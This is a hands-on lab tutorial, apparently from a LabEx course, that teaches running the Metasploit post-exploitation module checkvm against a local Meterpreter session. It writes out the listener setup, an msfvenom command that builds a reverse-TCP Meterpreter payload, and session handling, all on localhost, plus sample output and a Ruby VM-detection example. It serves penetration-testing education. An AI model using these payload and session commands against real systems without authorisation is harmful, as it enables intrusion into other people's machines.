Run a Post-Exploitation Module in Metasploit


Introduction

Post-exploitation is the phase in a penetration test that occurs after an attacker has gained initial access to a target system. During this phase, the goal is to gather more information, escalate privileges, pivot to other systems, and maintain persistent access. The Metasploit Framework provides a vast collection of post-exploitation modules to automate these tasks.

In this lab, you will learn the fundamental workflow for using a post-exploitation module in Metasploit. You will start by establishing a Meterpreter session, then search for a suitable module, configure it, and run it against the active session to gather information about the target system. We will use the post/linux/gather/checkvm module as an example, which attempts to determine if the compromised host is a virtual machine.

Have an active Meterpreter session

In this step, you will set up a listener in Metasploit and then execute a payload to simulate a compromised host connecting back, thereby creating an active Meterpreter session. This session is the prerequisite for running any post-exploitation module.

First, let's start the Metasploit Framework console. Open a terminal and type:

msfconsole -q

The -q flag suppresses the startup banner. Once you are at the msf6 > prompt, we will configure a listener. We'll use the generic multi/handler and a Linux Meterpreter payload.

Type the following commands into the msfconsole prompt:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 127.0.0.1

Now, run the listener as a background job using exploit -j:

exploit -j

You should see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, open a new terminal (you can use the + button in the terminal tab bar). In this new terminal, we will generate and run the payload that connects back to our listener. We'll use msfvenom to create a Linux executable file.

In the second terminal, execute this command to create the payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/shell.elf

This command creates an ELF (Executable and Linkable Format) file named shell.elf in your ~/project directory.

Next, make the file executable:

chmod +x ~/project/shell.elf

Finally, from the ~/project directory, run the payload to establish the session:

./shell.elf

Now, switch back to your first terminal (the one with msfconsole). You should see a message indicating that a new session has been created.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38978) at 2023-10-27 10:30:00 -0400

To confirm, you can list all active sessions with the sessions command.

sessions

You will see your active session listed, which means you are ready for the next step.

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/linux               127.0.0.1:4444 -> 127.0.0.1:38978 (127.0.0.1)

Background the session and use the search command for post modules

In this step, you will learn how to interact with your new session and then return to the main msfconsole prompt to search for post-exploitation modules.

After the sessions command, you are at the msf6 > prompt. To interact with the session, use the sessions -i command followed by the session ID.

sessions -i 1

Your prompt will change to meterpreter >, indicating you are now inside the compromised system's session.

[*] Starting interaction with 1...

meterpreter >

To run a post-exploitation module, you need to be at the main msf6 > prompt. To leave the Meterpreter session active but return to the main console, use the background command.

background

You will see a message confirming the session is running in the background, and your prompt will return to msf6 >.

[*] Backgrounding session 1...
msf6 >

Now, you can search for post-exploitation modules using the search command. This command is very powerful and can filter modules by type, platform, name, and more. To find modules that check for virtual machines, you can search for the keyword checkvm.

search checkvm

Metasploit will list all modules matching the keyword.

Matching Modules
================

   ##   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   post/linux/gather/checkvm                             normal  No     Linux Gather Virtual Machine Environment Detection
   1   post/windows/gather/checkvm                           normal  No     Windows Gather Virtual Machine Environment Detection
   ...

This shows that there are modules for both Linux and Windows. Since our session is on a Linux target, we will use post/linux/gather/checkvm.

Select a post-exploitation module like post/linux/gather/checkvm

In this step, you will select the post-exploitation module you found in the previous step and view its configuration options.

To select or "use" a module in Metasploit, you use the use command followed by the full name of the module. Based on our search results, we will use post/linux/gather/checkvm.

use post/linux/gather/checkvm

Your prompt will change to reflect the currently selected module.

msf6 post(linux/gather/checkvm) >

Once a module is selected, you should always check its options to see what needs to be configured. The show options command will display all available settings for the current module.

show options

The output will show the module's options, their current settings, and whether they are required.

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

As you can see, the SESSION option is required, but it does not have a value yet. This option tells Metasploit which of your active sessions to run the module against.

Set the SESSION option to your active session ID

In this step, you will configure the required SESSION option for the post-exploitation module.

From the previous steps, we know our active session has an ID of 1. We need to provide this ID to the module. The set command is used to configure module options.

To set the SESSION option to 1, run the following command:

set SESSION 1

You should see a confirmation that the value has been set.

SESSION => 1

To be certain, you can run show options again to verify that the SESSION option is now correctly configured.

show options

The output will now show 1 as the current setting for SESSION.

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

With the SESSION option set, the module is now ready to be executed.

Run the module and analyze the results

In this step, you will execute the configured post-exploitation module and analyze its output.

With the module selected and all required options set, you can now execute it. In Metasploit, you can use either the run or exploit command to execute a module. For post-exploitation modules, run is conventionally used.

run

The module will now execute on the target session (Session 1). It will perform its checks and print the results to your console. The LabEx environment itself runs on a virtual machine, so you should see a positive result.

[*] Checking for Xen...
[+] This is a Xen Virtual Machine
[*] Checking for VMWare...
[*] This does not appear to be a VMWare Virtual Machine.
[*] Checking for VirtualBox...
[*] This does not appear to be a VirtualBox Virtual Machine.
[*] Checking for KVM...
[+] This is a KVM/QEMU Virtual Machine
[*] Checking for Hyper-V...
[*] This does not appear to be a Hyper-V Virtual Machine.
[*] Post module execution completed

Analysis of the results:

The output clearly indicates that the target system is detected as both a Xen and a KVM/QEMU virtual machine. This is valuable intelligence for a penetration tester. Knowing a target is virtualized can influence future actions, such as looking for VM escape vulnerabilities or understanding the underlying infrastructure.
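To make the module's output less of a black box, here is an added Ruby example (not the checkvm module's own code) that applies the kinds of host artifacts a Linux VM-detection check inspects: DMI product/vendor strings, guest kernel modules from lsmod, and the hypervisor CPU flag. The signature lists and the sample inputs are constructed for this illustration and are assumptions, not the module's exact logic.

```ruby
# Signatures for common hypervisors (constructed for this example; the real
# module's checks may differ). Keys are the name reported when matched.
HYPERVISOR_SIGNATURES = {
  # strings seen in /sys/class/dmi/id/product_name or sys_vendor
  dmi: {
    'VMware'     => /vmware/i,
    'VirtualBox' => /virtualbox/i,
    'Xen'        => /\bxen\b|HVM domU/i,
    'KVM/QEMU'   => /qemu|kvm|bochs/i,
    'Hyper-V'    => /virtual machine|microsoft corporation/i,
  },
  # guest driver modules as listed by lsmod (first column)
  modules: {
    'VMware'     => /^vmw_|^vmxnet/,
    'VirtualBox' => /^vbox/,
    'Xen'        => /^xen/,
    'KVM/QEMU'   => /^virtio/,   # typical of KVM/QEMU guests, but not exclusive to them
    'Hyper-V'    => /^hv_/,
  },
}.freeze

# Returns the unique list of hypervisor names whose artifacts appear in the
# supplied inputs. Each input is the text of a file/command on the target.
def detect_hypervisors(dmi:, lsmod:, cpuinfo:)
  found = []
  HYPERVISOR_SIGNATURES[:dmi].each { |name, re| found << name if dmi.match?(re) }
  module_names = lsmod.lines.drop(1).map { |l| l.split.first.to_s } # skip header
  HYPERVISOR_SIGNATURES[:modules].each do |name, re|
    found << name if module_names.any? { |m| m.match?(re) }
  end
  # The 'hypervisor' CPU flag only says "some hypervisor", not which one.
  if found.empty? && cpuinfo =~ /^flags\s*:.*\bhypervisor\b/
    found << 'unknown hypervisor (cpu flag)'
  end
  found.uniq
end

# Constructed sample inputs standing in for what would be read on the target.
SAMPLE_DMI = "Xen HVM domU\nXen\n".freeze
SAMPLE_LSMOD = <<~LSMOD.freeze
  Module                  Size  Used by
  xen_netfront           32768  0
  virtio_blk             24576  2
  ext4                  737280  1
LSMOD
SAMPLE_CPUINFO = "flags\t\t: fpu vme de pse hypervisor\n".freeze

puts detect_hypervisors(dmi: SAMPLE_DMI, lsmod: SAMPLE_LSMOD, cpuinfo: SAMPLE_CPUINFO).inspect
```

A host can match more than one signature, as the lab output above shows; treat each line as a piece of evidence rather than a final verdict.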

You have now successfully run your first post-exploitation module!

Summary

In this lab, you have learned the essential workflow for using post-exploitation modules within the Metasploit Framework. You successfully performed the entire process from establishing a foothold to gathering intelligence on the target system.

You have learned how to:

  • Create a listener and establish a Meterpreter session.
  • Background an active session to return to the main msfconsole prompt.
  • Use the search command to find relevant post-exploitation modules.
  • Select a module with the use command and view its settings with show options.
  • Configure a module by setting the required SESSION option.
  • Execute the module with the run command and analyze its output.

This fundamental skill is a building block for more advanced post-exploitation activities, such as privilege escalation, credential harvesting, and lateral movement across a network.